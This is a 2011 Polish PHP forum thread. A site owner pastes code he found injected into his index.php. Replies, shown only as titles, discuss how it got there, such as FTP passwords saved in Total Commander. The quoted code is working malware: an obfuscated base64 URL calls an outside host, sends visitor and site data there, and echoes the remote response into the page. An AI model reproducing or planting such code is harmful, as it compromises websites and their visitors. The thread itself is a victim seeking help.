Podejrzenie włamania na serwer

Podejrzenie włamania na serwer, Proszę o szybką pomoc

Barcelona Zobacz profil	27.09.2011, 23:36:55 Post #1
Grupa: Zarejestrowani Postów: 322 Pomógł: 15 Dołączył: 29.01.2010 Ostrzeżenie: (0%)	Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem: [PHP] pobierz, plaintext <?php // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } ?> [PHP] pobierz, plaintext Co to jest? Proszę o pomoc.

Posty w temacie

Barcelona Podejrzenie włamania na serwer 27.09.2011, 23:36:55

tabbi Ktoś zbiera dane na temat twojej strony i wysyła ... 27.09.2011, 23:55:21

Barcelona Tutaj zostaje wysłane, ale jakim cudem ten kod zna... 28.09.2011, 00:03:40

tabbi Odpowiedzi na to pytanie może być wiele, zaczynaj... 28.09.2011, 00:57:51

Barcelona Nikomu nie udostępniałem hasła, znam go tylko ja i... 28.09.2011, 01:43:53

Damonsson Total Commander? ;> 28.09.2011, 01:46:10

Barcelona Już dawno nie, WinSCP 28.09.2011, 02:02:17

konrados CytatTotal Commander? A właściwie to o co chodzi ... 2.10.2011, 12:54:04

pienso Jak będziesz wiedział to daj znać gdzie była luka ... 2.10.2011, 13:55:55

konrados CytatJak będziesz wiedział to daj znać gdzie była ... 2.10.2011, 15:10:37

drozdii07 Jeśli zapamiętujesz hasło w TC, to później wirusy ... 2.10.2011, 15:14:52

konrados CytatJeśli zapamiętujesz hasło w TC, to później wi... 2.10.2011, 15:19:40

Fifi209 Cytat(konrados @ 2.10.2011, 16:19:40 ... 2.10.2011, 15:53:44

Korab To może przeskanuj sobie komputer dwoma programami... 2.10.2011, 16:03:31

konrados CytatPo pierwsze, nie musisz sobie ściągać wirusa ... 2.10.2011, 16:42:25

92nasti Cytat(konrados @ 2.10.2011, 17:42:25 ... 2.10.2011, 17:41:38

konrados CytatBłyszczysz wiedzą, w sumie to za chwile dojdz... 2.10.2011, 17:49:26

Barcelona Uuuu troche mnie nie było i widzę że wątek nabrał ... 2.10.2011, 21:50:21

mcsgroup Cytat(Barcelona @ 2.10.2011, 22:50:21... 4.10.2011, 12:22:09

by_ikar KodWracając do tematów TC i wirusów, to ja jestem ... 3.10.2011, 09:54:32

Barcelona CytatWytłumacz mi jak antywirus znajdzie wirusa, n... 4.10.2011, 11:39:02

Barcelona No i dziękuje za potwierdzenie mojej teorii Jest ... 6.10.2011, 14:44:10

gekoncaros Witam nie jestes sam ja tez na serwerze linuxpl.co... 23.11.2011, 12:24:14

pioklo Cytat(gekoncaros @ 23.11.2011, 13:24... 25.11.2011, 22:58:10

« Następny starszy · PHP · Następny nowszy »

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Wersja Lo-Fi

Aktualny czas: 14.08.2025 - 23:22

Hosting zapewnia

Forum PHP.pl